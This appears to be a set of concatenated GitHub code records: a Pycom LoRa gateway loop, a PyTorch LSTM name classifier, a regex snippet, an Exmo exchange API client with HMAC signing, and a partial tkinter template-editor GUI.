lora_sock.send(pkg)\n print(\"schedule sent!\")\n time.sleep(1)\n while (lora.ischannel_free(-100) == False):\n time.sleep_ms(100)\n data = \"init\"\n pkg = struct.pack(_LORA_PKG_FORMAT % len(data), MY_ID, len(data), data)\n lora_sock.send(pkg)\n print(\"Init command sent!\")\n my_data = list()\n time.sleep_ms(207) # propagation time of init with SF12\n chrono = Timer.Chrono()\n chrono.start()\n start = chrono.read_ms()\n finish = start\n i = 1\n while ((finish - start) < (round_length*102 + 100*(3*guard + 50)/sync_rate)): # data collection time + some extra\n pycom.rgbled(red)\n round_start = chrono.read_ms()\n print(i, \"----------------------------------------------------\")\n print(\"started new round at:\", round_start)\n lora.init(mode=LoRa.LORA, rx_iq=True, region=LoRa.EU868, frequency=freqs[my_sf-7], power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=my_sf)\n print(\"started receiving at:\", chrono.read_ms())\n while ((chrono.read_ms() - round_start) < (round_length)):\n recv_pkg = lora_sock.recv(8192)\n if (len(recv_pkg) > 2):\n recv_pkg_len = recv_pkg[1]\n recv_pkg_id = recv_pkg[0]\n if (int(recv_pkg_id) <= 20) and (int(recv_pkg_len) == 98):\n dev_id, leng, msg = struct.unpack(_LORA_RCV_PKG_FORMAT % recv_pkg_len, recv_pkg)\n print('Device: %d - Pkg: %s' % (dev_id, msg))\n if (str(msg) == 
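# --- Editor's sketch: a round trip of the gateway wire format used just above --
# network byte order, one byte sender id, one byte payload length, then the payload.
# (struct's "%ds" field wants bytes; the payload string here is a made-up example.)
import struct

_FMT = "!BB%ds"
my_id, data = 0x01, b"40:1:schedule"
pkg = struct.pack(_FMT % len(data), my_id, len(data), data)
dev_id, length = pkg[0], pkg[1]                  # same peek the receive loop does
_, _, msg = struct.unpack(_FMT % length, pkg)
assert (dev_id, msg) == (my_id, data)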
\"b'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'\"): # format check\n msg = int(dev_id)\n my_data.append(msg)\n\n if (i % sync_rate == 0): # synchronisation\n sync_slot = 100 # I have to fix this\n sync_start = chrono.read_ms()\n print(\"entered sync at:\", sync_start)\n pycom.rgbled(white)\n time.sleep_ms(2*guard) # let's make it long so all the nodes are up\n lora.init(mode=LoRa.LORA, tx_iq=True, frequency=freqs[my_sf-7], region=LoRa.EU868, power_mode=LoRa.ALWAYS_ON, bandwidth=my_bw, sf=my_sf, tx_power=14)\n if (sync_method == 1): # 1st sync method\n data = int(chrono.read_ms())\n data = str(data)\n else: # 2nd sync method\n data = \"sync\"\n pkg = struct.pack(_LORA_PKG_FORMAT % len(data), MY_ID, len(data), data)\n while (lora.ischannel_free(-100) == False): # precision killer\n print(\"act on channel!\")\n time.sleep_ms(100)\n if (sync_method == 1):\n data = int(chrono.read_ms())\n data = str(data)\n pkg = struct.pack(_LORA_PKG_FORMAT % len(data), MY_ID, len(data), data)\n lora_sock.send(pkg)\n print(\"Sent sync: \"+data)\n time.sleep_ms(guard)\n print(\"sync lasted:\", abs(time.ticks_diff(int(chrono.read_ms()), int(sync_start))), \"ms\")\n\n finish = chrono.read_ms()\n print(\"round lasted:\", abs(time.ticks_diff(int(finish), int(round_start))), \"ms\")\n i += 1\n\n time.sleep(1)\n pycom.rgbled(green)\n occur = {}\n stats = []\n for n in my_node_list:\n occur[n] = 0\n for n in my_data:\n occur[n] += 1\n for n in sorted(occur.keys()):\n print(\"%s: %s\" % (n, occur[n]))\n stats.append(occur[n])\n print(str(stats))\n # send data to network server\n wlan_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n wlan_s.connect(('192.168.0.254', 8000))\n wlan_s.send(str(stats))\n wlan_s.close()\n print(\"data was sent to network server!\")\n pycom.rgbled(off)\n time.sleep(10)\n","repo_name":"deltazita/offline-lora","sub_path":"pycom_implementations/light_gw.py","file_name":"light_gw.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22868880637","text":"from basic_imports import *\nfrom torch_imports import *\nimport glob\nimport unicodedata\nimport string\n\nclass Config:\n datadir = 'data/names/*.txt'\n batch_size = 16\n hidden_dim = 128\n lr = 0.03\n device = 'cuda:1'\n num_layers = 1\n num_epochs = 7\n \n\ndef findFiles(path): return glob.glob(path)\n\n\n# Turn a Unicode string to plain ASCII, thanks to https://stackoverflow.com/a/518232/2809427\ndef unicodeToAscii(s, all_letters):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n and c in all_letters\n )\n\n# Read a file and split into lines\ndef readLines(filename, all_letters):\n lines = open(filename, encoding='utf-8').read().strip().split('\\n')\n return [unicodeToAscii(line, all_letters) for line in lines]\n\n# Find letter index from all_letters, e.g. 
\"a\" = 0\ndef letterToIndex(letter, all_letters):\n return all_letters.find(letter)\n\ndef lineToTensor(lines, all_letters):\n word_list = []\n for word in lines:\n letter_list = []\n for l in word:\n letter_list.append(letterToIndex(l, all_letters))\n word_list.append(letter_list)\n return np.array(word_list)\n\n\ndef collate_fn(batch):\n x, y = zip(*batch)\n lens = np.array([len(o) for o in x])\n max_len = max(lens)\n seq_lens_idx = np.argsort(lens)[::-1]\n lens = torch.Tensor(lens[seq_lens_idx]).long()\n x = [x[i] for i in seq_lens_idx]\n tensor_y = torch.Tensor([y[i] for i in seq_lens_idx]).long()\n tensor_x = torch.zeros( len(x), max_len, n_letters) \n for wi, word in enumerate(x):\n for li, letter in enumerate(word):\n tensor_x[wi][li][letter] = 1\n \n return tensor_x, lens, tensor_y\n\nclass NameDataset(Dataset):\n def __init__(self, X, y):\n self.X = X\n self.y = y\n \n def __getitem__(self, i):\n return self.X[i], self.y[i]\n \n def __len__(self): return len(self.y)\n\n \n\n\nclass RNN(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers, output_size, model_type):\n super().__init__()\n if model_type == 'rnn':\n self.model = nn.RNN\n elif model_type == 'lstm':\n self.model = nn.LSTM\n elif model_type == 'gru':\n self.model = nn.GRU\n self.rnn = self.model(input_size=input_size, hidden_size=hidden_size, num_layers=num_layers, batch_first=True)\n self.fc = nn.Linear(hidden_size, output_size)\n self.model_type = model_type\n \n def forward(self, inputs):\n x, seq_lens = inputs\n ## TODO: need to unpack?\n x_pack = nn.utils.rnn.pack_padded_sequence(x, seq_lens, batch_first=True)\n if self.model_type == 'rnn' or self.model_type == 'gru':\n y_pack, hn = self.rnn(x_pack)\n elif self.model_type == 'lstm':\n y_pack, (hn, _) = self.rnn(x_pack)\n y, _ = nn.utils.rnn.pad_packed_sequence(y_pack, batch_first=True)\n y_last = torch.stack([y[i,seq_lens[i]-1,:] for i in range(len(x))])\n output = self.fc(y_last)\n return output\n \n\n\ndef train(model, dl, optimizer, criterion, num_instances, config, train=True):\n if train:\n model.train()\n else:\n model.eval()\n loss, acc = 0, 0\n \n for X, seq_lens, y in dl:\n X = X.to(config.device)\n seq_lens = seq_lens.to(config.device)\n labels = y.to(config.device)\n optimizer.zero_grad()\n \n with torch.set_grad_enabled(train):\n outputs = model( (X, seq_lens) )\n preds = outputs.argmax(dim=1)\n l = criterion(outputs, labels)\n if train:\n l.backward()\n optimizer.step()\n loss += l.item()\n acc += torch.sum(preds == labels).item()\n loss /= len(dl)\n acc /= num_instances\n return loss, acc\n\ndef fit(ds_trn, ds_val, dl_trn, dl_val, model, criterion, config):\n optimizer = torch.optim.SGD(model.parameters(), lr=config.lr)\n best_acc = 0\n trn_losses, val_losses, val_accs = [], [], []\n for epoch in range(config.num_epochs):\n # train\n trn_loss, trn_acc = train(model, dl_trn, optimizer, criterion, len(ds_trn), config, train=True)\n # val\n val_loss, val_acc = train(model, dl_val, optimizer, criterion, len(ds_val), config, train=False)\n trn_losses.append(trn_loss)\n val_losses.append(val_loss)\n val_accs.append(val_acc)\n if val_acc > best_acc:\n best_acc = val_acc\n best_weights = model.state_dict()\n best_epoch = epoch\n print(f'Epoch {epoch}/{config.num_epochs - 1}, trn_loss {trn_loss} val_loss {val_loss} val_acc {val_acc}')\n return best_weights, best_epoch, [best_acc, trn_losses, val_losses, val_accs]\n\n\ndef main():\n global n_letters\n config = Config()\n all_letters = string.ascii_letters + \" .,;'\"\n n_letters = 
len(all_letters)\n \n # Build the category_lines dictionary, a list of names per language\n category_lines = {}\n all_categories = []\n\n for filename in findFiles(config.datadir):\n category = os.path.splitext(os.path.basename(filename))[0]\n all_categories.append(category)\n lines = readLines(filename, all_letters)\n category_lines[category] = lines\n n_categories = len(category_lines.keys())\n\n max_len = max([len(o) for k in category_lines.keys() for o in category_lines[k]])\n trn_xs, trn_ys, val_xs, val_ys = [], [], [], []\n\n for k in category_lines.keys():\n names = category_lines[k]\n x = lineToTensor(names, all_letters)\n idx = np.arange(len(names))\n y = np.array([all_categories.index(k) for _ in range(len(names))])\n ## train and tst\n trn_idx, tst_idx = np.split(idx, [int(len(names)*0.8)])\n trn_x, trn_y, val_x, val_y = x[trn_idx], y[trn_idx], x[tst_idx], y[tst_idx]\n\n ## merge\n trn_xs += list(trn_x)\n trn_ys.append(trn_y)\n val_xs += list(val_x)\n val_ys.append(val_y)\n trn_ys = np.concatenate(trn_ys)\n val_ys = np.concatenate(val_ys)\n \n ds_trn = NameDataset(trn_xs, trn_ys)\n ds_val = NameDataset(val_xs, val_ys)\n dl_trn = DataLoader(ds_trn, batch_size=config.batch_size, collate_fn=collate_fn, shuffle=True)\n dl_val = DataLoader(ds_val, batch_size=config.batch_size, collate_fn=collate_fn, shuffle=True)\n \n criterion = nn.CrossEntropyLoss()\n model = RNN(n_letters, config.hidden_dim, config.num_layers, n_categories, 'lstm')\n model = model.to(config.device)\n best_weights, best_epoch, [best_acc, trn_losses, val_losses, val_accs] = fit(ds_trn, ds_val, dl_trn, dl_val, model, criterion, config)\n return best_weights, best_epoch, [best_acc, trn_losses, val_losses, val_accs]\n\nif __name__ == '__main__':\n best_weights, best_epoch, [best_acc, trn_losses, val_losses, val_accs] = main()\n print(f\"Best accuracy of current configuration is: {best_acc}\")","repo_name":"Emrys-Hong/SUTD-deep-learning-homework","sub_path":"deep-learning/coding-wk8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13516229454","text":"#Administração de Sistemas Informáticos, Exemplos Básicos\n#Pedro \"pedroma2000\" Machado\n\nimport re\n\nstr = \"8180238;Pedro Machado;M;21;912345678\"\n\npattern = re.compile(r'^(?P.*);(?P\\d{9}$)')\n\nif pattern.match(str):\n print(\"Match\")\n print(pattern.sub(r\"\\g;00351\\g\", str))\n\nelse:\n print(\"Doesn't match\")","repo_name":"pedroma2000/ASI","sub_path":"Exemplos/Backtrack/Example_2.py","file_name":"Example_2.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22431279380","text":"import ssl\r\nimport time\r\nimport json\r\nimport urllib\r\nimport hmac, hashlib\r\nfrom urllib import response\r\nimport requests\r\nfrom urllib.parse import urlparse, urlencode\r\nfrom urllib.request import Request, urlopen\r\n\r\n\r\nclass Exmo():\r\n\r\n def __init__(self, API_KEY, API_SECRET):\r\n self.API_KEY = API_KEY\r\n self.API_SECRET = bytes(API_SECRET, encoding='utf-8')\r\n\r\n def _sign(self, payload):\r\n \r\n payload = urlencode(payload)\r\n\r\n H = hmac.new(key = self.API_SECRET, digestmod=hashlib.sha512)\r\n\r\n H.update(payload.encode('utf-8'))\r\n\r\n sign = H.hexdigest()\r\n\r\n return sign\r\n\r\n def trades(self, base, quote) -> dict:\r\n '''\r\n Возвращает список последних сделок по текущей паре\r\n\r\n пример trades('btc', 
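# --- Editor's sketch (toy sizes): what collate_fn above hands the model -- sequences
# sorted longest-first (as nn.utils.rnn.pack_padded_sequence expects by default), a
# zero-padded one-hot tensor, and the matching length vector.
import torch
import torch.nn as nn

n_letters = 5                                    # toy alphabet size
seqs = [[0, 1], [2], [3, 4, 1]]                  # letter-index sequences of one batch
seqs = sorted(seqs, key=len, reverse=True)       # longest first
lens = torch.tensor([len(s) for s in seqs])
padded = torch.zeros(len(seqs), int(lens[0]), n_letters)
for i, seq in enumerate(seqs):
    for t, letter in enumerate(seq):
        padded[i, t, letter] = 1.0               # one-hot encode, zero-pad the rest
packed = nn.utils.rnn.pack_padded_sequence(padded, lens, batch_first=True)
print(packed.batch_sizes)                        # tensor([3, 2, 1])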
'usd') -> вернёт список последних сделок по паре BTC/USD\r\n '''\r\n url = \"https://api.exmo.com/v1.1/trades\"\r\n\r\n \r\n payload = dict(\r\n pair = f'{base.upper()}_{quote.upper()}'\r\n )\r\n \r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n \r\n def order_book (self, base, quote, limit = 100) -> dict:\r\n '''\r\n Возвращает список текущих ордеров по конкретной паре\r\n\r\n пример order_book('BTC','USD',100) -> вернет книгу ордеров на глубину 100\r\n '''\r\n url = \"https://api.exmo.com/v1.1/order_book\"\r\n\r\n payload = dict(\r\n pair = f'{base.upper()}_{quote.upper()}',\r\n limit = f'{str(limit)}'\r\n )\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def tiker (self) -> dict:\r\n '''\r\n Метод возвращает статистику по всем текущим парам\r\n '''\r\n url = \"https://api.exmo.com/v1.1/ticker\"\r\n\r\n payload = {}\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n \r\n def pair_settings(self) -> dict:\r\n '''\r\n Возвращает настройки торговых пар\r\n '''\r\n url = \"https://api.exmo.com/v1.1/pair_settings\"\r\n\r\n payload={}\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def currency (self) -> dict:\r\n '''\r\n Возвращает список доступных активов на бирже\r\n '''\r\n url = \"https://api.exmo.com/v1.1/currency\"\r\n\r\n payload={}\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def _currency (self) -> dict:\r\n '''\r\n Возврат раширенного списка активов\r\n '''\r\n url = \"https://api.exmo.com/v1.1/currency/list/extended\"\r\n\r\n payload={}\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"GET\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def required_amount (self, base, quote, quantity) -> dict:\r\n '''\r\n Вернёт расчет суммы покупки определенного количества валюты для конкретной валютной пары\r\n '''\r\n url = \"https://api.exmo.com/v1.1/required_amount\"\r\n\r\n payload= dict(\r\n pair = f'{base.upper()}_{quote.upper()}',\r\n quantity = f'{quantity}'\r\n )\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded'\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def candles_history(self, base, quote, resolution, limit) -> dict:\r\n '''\r\n Возвращает данные о свечах в данной торговой паре\r\n\r\n варианты resolution : {\r\n 1 = 1 minute,\r\n 5 = 5 minute,\r\n 15 = 15 minute,\r\n 30 = 30 minute,\r\n 45 = 45 minute,\r\n 60 = 60 minute,\r\n 120 = 120 minute,\r\n 180 = 180 minute,\r\n 240 = 240 minute\r\n 1440 = 1 day,\r\n 10080 = 1 week\r\n }\r\n\r\n limit - количество свечей от текущей\r\n '''\r\n \r\n end = int(time.time())\r\n start = end - int(resolution)*60*int(limit)\r\n\r\n if resolution == 1440:\r\n resolution = 'D'\r\n if resolution == 
10080:\r\n resolution = 'W'\r\n \r\n url = f'https://api.exmo.com/v1.1/candles_history?symbol={base.upper()}_{quote.upper()}&resolution={str(resolution)}&from={str(start)}&to={str(end)}'\r\n\r\n payload = {}\r\n\r\n headers = {}\r\n \r\n response = requests.request('GET', url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def payments_providers_crypto_list(self) -> dict:\r\n '''\r\n Возвращает список крипто провайдеров биржи\r\n '''\r\n\r\n url = \"https://api.exmo.com/v1.1/payments/providers/crypto/list\"\r\n\r\n payload={}\r\n headers = {}\r\n\r\n response = requests.request(\"GET\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def user_info (self) -> dict:\r\n\r\n url = 'https://api.exmo.com/v1.1/user_info'\r\n\r\n payload = dict()\r\n\r\n payload.update(nonce = int(time.time()*1000))\r\n\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Key': self.API_KEY,\r\n 'Sign': self._sign(payload)\r\n }\r\n \r\n response = requests.request('POST', url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n\r\n def order_create(self, base, quote, type, quantity, price = 0) -> dict :\r\n url = 'https://api.exmo.com/v1.1/order_create'\r\n\r\n payload = dict(\r\n pair = f'{base.upper()}_{quote.upper()}',\r\n quantity = f'{quantity}',\r\n type = f'{type}',\r\n price = f'{price}'\r\n )\r\n payload.update(nonce = int(time.time()*1000))\r\n \r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Key': self.API_KEY,\r\n 'Sign': self._sign(payload)\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n\r\n return response.json()\r\n \r\n def open_orders (self) -> dict:\r\n\r\n '''\r\n Возвращает текущие открытые ордера\r\n ''' \r\n url = 'https://api.exmo.com/v1.1/user_open_orders'\r\n\r\n pair:tuple = self.pair_settings().keys()\r\n pair = ','.join(pair)\r\n payload = dict (\r\n pair = pair\r\n )\r\n payload.update(nonce = int(time.time()*1000))\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Key': self.API_KEY,\r\n 'Sign': self._sign(payload)\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n return response.json()\r\n\r\n def cancel_order (self, id) -> dict:\r\n url = 'https://api.exmo.com/v1.1/order_cancel'\r\n\r\n payload = dict(\r\n order_id = f'{id}'\r\n )\r\n payload.update(nonce = int(time.time()*1000))\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Key': self.API_KEY,\r\n 'Sign': self._sign(payload)\r\n }\r\n\r\n response = requests.request(\"POST\", url, headers=headers, data=payload)\r\n return response.json()","repo_name":"OGKuz/EXMO_LIGHT_CLIENT","sub_path":"drivers.py","file_name":"drivers.py","file_ext":"py","file_size_in_byte":8443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20197810163","text":"from dataclasses import field\nfrom pickle import NONE\nimport tkinter as tk\nfrom tkinter import LabelFrame, ttk\nfrom tkinter import messagebox\nfrom turtle import left\nfrom numpy import imag\n\nfrom setuptools import Command\nimport GenerateConfig as Gc\nimport json,io,os\nimport fontawesome as fa\nfrom ttkthemes import ThemedStyle\nimport time\n\n\nclass AddTemplate:\n config=None \n ContainerFrame=None \n displayFont = ( \"Verdana\", 10)\n combostyle=None\n treeViewStyle=None\n 
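# --- Editor's sketch (standalone, demo credentials): the request signing done by
# Exmo._sign() above and documented in the Russian docstrings (each method wraps one
# public or authenticated endpoint: trades, order book, ticker, candles, orders, etc.).
# The POST body, including a millisecond nonce, is urlencoded, HMAC-SHA512-signed with
# the API secret, and the hex digest travels in the Sign header next to the Key header.
import hashlib, hmac, time
from urllib.parse import urlencode

API_SECRET = b"demo-secret"                       # hypothetical secret
payload = {"pair": "BTC_USD", "nonce": int(time.time() * 1000)}
body = urlencode(payload)
sign = hmac.new(API_SECRET, body.encode("utf-8"), hashlib.sha512).hexdigest()
headers = {"Content-Type": "application/x-www-form-urlencoded",
           "Key": "demo-key", "Sign": sign}
print(len(sign))                                  # 128 hex characters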
varAllTemlate,varAllTemlateName,varCurrentTemplate,varAllSection,varCurrentSection,varAllAction=[],[],None,[],None,[] \n IsUpdateSection,IsUpdateAction,treev2_selected_items,treev2_selected_index=False,False,None,-1\n \n varActionType= None \n varCurrentTemplateName=None\n varCurrentUrl=None\n \n\n chdFrm1,chdFrm2=None,None\n var_allSectionName,var_allSectionType,var_allSectionCategory,var_allSectionCategoryType,var_allSelectorType, var_allActionType,var_allInputType,var_allConditionType=None,None,None,None,None, None,None,None\n \n var_sectionName,var_sectionType,var_sectionCategory=None,None,None\n var_actionId,var_actionType,var_controlSelectorType,var_control,var_inputType,var_manualValue,var_ioValue,var_nextActionId,var_ActionStartupType,var_conditionType,var_leftInputType,var_leftManualValue,var_leftIOValue,var_rightInputType,var_rightManualValue,var_rightIOValue,var_trueActionId,var_falseActionId=None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None\n\n treev1,treev2=None,None;\n\n var_0_FunctionName,var_0_SectionName,var_0_KeyName=None,None,None\n var_1_FunctionName,var_1_SectionName,var_1_KeyName=None,None,None\n var_2_FunctionName,var_2_SectionName,var_2_KeyName=None,None,None\n val_AllFunctionName,AllKeyName1,AllKeyName2,AllKeyName3=[],[],[],[]\n\n def __init__(self,Container,config):\n self.config=config \n self.varActionType= tk.StringVar() \n self.varCurrentTemplateName= tk.StringVar()\n self.varCurrentUrl= tk.StringVar() \n self.ContainerFrame=Container \n self.LoadFromConfig() \n self.fncCreateItems()\n \n def LoadFromConfig(self):\n self.var_allSectionName,self.var_allSectionType,self.var_allSectionCategory,self.var_allSectionCategoryType,self.var_allSelectorType, self.var_allActionType,self.var_allInputType,self.var_allConditionType=self.config.SectionNames,self.config.SectionType,self.config.SectionCategory,self.config.SectionCategoryType,self.config.SelectorType,self.config.ActionTypes,self.config.InputType,self.config.ConditionType\n self.var_actionId,self.var_actionType,self.var_controlSelectorType,self.var_control,self.var_inputType,self.var_manualValue,self.var_ioValue,self.var_nextActionId,self.var_ActionStartupType,self.var_conditionType,self.var_leftInputType,self.var_leftManualValue,self.var_leftIOValue,self.var_rightInputType,self.var_rightManualValue,self.var_rightIOValue,self.var_trueActionId,self.var_falseActionId = tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar()\n self.var_sectionName,self.var_sectionType,self.var_sectionCategory=tk.StringVar(),tk.StringVar(),tk.StringVar()\n self.var_0_FunctionName,self.var_0_SectionName,self.var_0_KeyName,self.var_1_FunctionName,self.var_1_SectionName,self.var_1_KeyName,self.var_2_FunctionName,self.var_2_SectionName,self.var_2_KeyName=tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar(),tk.StringVar()\n self.val_AllFunctionName=self.config.CustomFunction\n self.var_actionType.set(\"Fill Input\")\n self.var_ActionStartupType.set(\"Middle\")\n self.LoadAllJsonData()\n \n \n def fncChangeTemplateType(self,event):\n if(self.varActionType.get()==\"Add Template\"):\n self.frmHeader.children[\"cmbTemplateName\"].grid_forget()\n self.frmHeader.children[\"txtTemplateName\"].grid(row=1,column = 1,padx=(10, 10), 
pady=(5, 2), sticky=tk.N+tk.S+tk.W) \n self.varCurrentTemplate=None\n self.varCurrentSection=None\n elif(self.varActionType.get()==\"Update Template\"):\n self.frmHeader.children[\"txtTemplateName\"].grid_forget()\n self.frmHeader.children[\"cmbTemplateName\"].grid(row=1,column = 1,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n self.BindDropDownTemplateName()\n \n def LoadAllJsonData(self):\n try:\n if not os.path.exists(self.config.FilePath):\n os.makedirs(self.config.FilePath) \n if os.path.isfile(os.path.join(self.config.FilePath, self.config.TemplateFileName)) is False:\n with io.open(os.path.join(self.config.FilePath, self.config.TemplateFileName), 'w') as fp:\n print('Empty File Created')\n else:\n with io.open(os.path.join(self.config.FilePath, self.config.TemplateFileName)) as fp:\n self.varAllTemlate=[]\n self.varAllTemlate = json.load(fp)\n self.varAllTemlateName=[]\n for x in self.varAllTemlate:\n self.varAllTemlateName.append(x[\"templateName\"])\n except Exception as ex:\n messagebox.showerror(\"Error\", ex)\n\n \n def BindDropDownTemplateName(self ):\n self.LoadAllJsonData()\n if(self.checkKey(self.frmHeader.children,\"cmbTemplateName\")):\n self.frmHeader.children[\"cmbTemplateName\"].configure(values=self.varAllTemlateName)\n\n def checkKey(self,dict, key): \n if key in dict.keys():\n return True\n else:\n return False\n\n def BindKeyName(self,procType=1,IsSectionDropDown=False): \n concatString=\"\"\n if(procType==1):\n if(self.var_0_FunctionName.get().lower().find(\"fncgetapplicantname\") !=-1):\n self.var_ioValue.set(self.var_0_FunctionName.get())\n return\n if(IsSectionDropDown):\n sectionData=self.BindAllKeyName(self.var_0_SectionName.get()) \n self.chdFrm1.children[\"frmchdFrm1_1\"].children[\"var_0_KeyName\"].configure(values=sectionData)\n return\n else:\n if(self.var_0_FunctionName.get()!=\"None\"):\n concatString= concatString+self.var_0_FunctionName.get()\n concatString= concatString+self.var_0_SectionName.get()\n if(self.GetSectiontype(self.var_0_SectionName.get())==\"Multiple\"):\n concatString= concatString+\"[]\"\n concatString= concatString+\":\"+str(self.var_0_KeyName.get()).replace(' ','_')\n self.var_ioValue.set(concatString)\n if(procType==2):\n if(self.var_1_FunctionName.get().lower().find(\"fncgetapplicantname\") !=-1):\n self.var_ioValue.set(self.var_1_FunctionName.get())\n return\n if(IsSectionDropDown):\n sectionData=self.BindAllKeyName(self.var_1_SectionName.get()) \n self.chdFrm2.children[\"frmchdFrm2_1\"].children[\"var_1_KeyName\"].configure(values=sectionData)\n return\n else:\n if(self.var_1_FunctionName.get()!=\"None\"):\n concatString= concatString+self.var_1_FunctionName.get()\n concatString= concatString+self.var_1_SectionName.get()\n if(self.GetSectiontype(self.var_1_SectionName.get())==\"Multiple\"):\n concatString= concatString+\"[]\"\n concatString= concatString+\":\"+ str(self.var_1_KeyName.get()).replace(' ','_') \n self.var_leftIOValue.set(concatString)\n if(procType==3):\n if(self.var_2_FunctionName.get().lower().find(\"fncgetapplicantname\") !=-1):\n self.var_ioValue.set(self.var_2_FunctionName.get())\n return\n if(IsSectionDropDown):\n sectionData=self.BindAllKeyName(self.var_2_SectionName.get()) \n self.chdFrm2.children[\"frmchdFrm2_2\"].children[\"var_2_KeyName\"].configure(values=sectionData)\n return\n else:\n if(self.var_2_FunctionName.get()!=\"None\"):\n concatString= concatString+self.var_2_FunctionName.get()\n concatString= concatString+self.var_2_SectionName.get()\n 
if(self.GetSectiontype(self.var_2_SectionName.get())==\"Multiple\"):\n concatString= concatString+\"[]\"\n concatString= concatString+\":\"+str(self.var_2_KeyName.get()).replace(' ','_') \n self.var_rightIOValue.set(concatString)\n\n \n\n def BindAllKeyName(self,sectionName): \n all_key=[]\n \"Liabilities\",\"Expenditure\",\"ExistingMortgage\",\"MortgageRequirements\"\n if(sectionName==\"PersonalDetails\"):\n all_key=self.config.IO_Name_PersonalDetails\n elif(sectionName==\"CurrentAddress\"):\n all_key=self.config.IO_Name_CurrentAddress\n elif(sectionName==\"PreviousAddress\"):\n all_key=self.config.IO_Name_PreviousAddress\n elif(sectionName==\"ContactDetails\"):\n all_key=self.config.IO_Name_ContactDetails\n elif(sectionName==\"ProfessionalContacts\"):\n all_key=self.config.IO_Name_ProfessionalContacts\n elif(sectionName==\"BankAccount\"):\n all_key=self.config.IO_Name_BankAccountDetails\n elif(sectionName==\"FamilyAndDependants\"):\n all_key=self.config.IO_Name_FamilyAndDependants\n elif(sectionName==\"IDVerification\"):\n all_key=self.config.IO_Name_IDVerification\n elif(sectionName==\"CurrentEmploymentDetails\"):\n all_key=self.config.IO_Name_CurrentEmploymentDetails\n elif(sectionName==\"Assets\"):\n all_key=self.config.IO_Name_Assets\n elif(sectionName==\"Liabilities\"):\n all_key=self.config.IO_Name_Liabilities\n elif(sectionName==\"Expenditure\"):\n all_key=self.config.IO_Name_Expenditure1\n elif(sectionName==\"ExistingMortgage\"):\n all_key=self.config.IO_Name_ExistingMortgage\n elif(sectionName==\"MortgageRequirements\"):\n all_key=self.config.IO_Name_MortgageRequirements\n for i ,x in enumerate(all_key):\n if(str(x).find(\"[M]\") !=-1 or str(x).find(\"[D]\") !=-1 ):\n all_key[i]=str(x).replace(\"[M]\",\"\").replace(\"[D]\",\"\") \n return all_key\n\n def BindExistingTreeview(self,event,procType=1):\n if(procType==1):\n self.varCurrentTemplate=None \n self.var_allSectionName=[]\n self.clear_all_gridview(procType) \n for template in self.varAllTemlate:\n if template[\"templateName\"]==self.varCurrentTemplateName.get():\n self.varCurrentTemplate=template\n if(self.varCurrentTemplate != None):\n self.varCurrentUrl.set(self.varCurrentTemplate[\"url\"])\n for sections in self.varCurrentTemplate[\"sections\"]: \n sectionName,sectionType,sectionCategory,actionCount='','','',0\n if(self.checkKey(sections,\"sectionName\")):\n sectionName=sections[\"sectionName\"]\n if(self.checkKey(sections,\"sectionType\")):\n sectionType=sections[\"sectionType\"]\n if(self.checkKey(sections,\"sectionCategory\")):\n sectionCategory=sections[\"sectionCategory\"]\n if(self.checkKey(sections,\"actions\")):\n actionCount=len(sections[\"actions\"]) \n 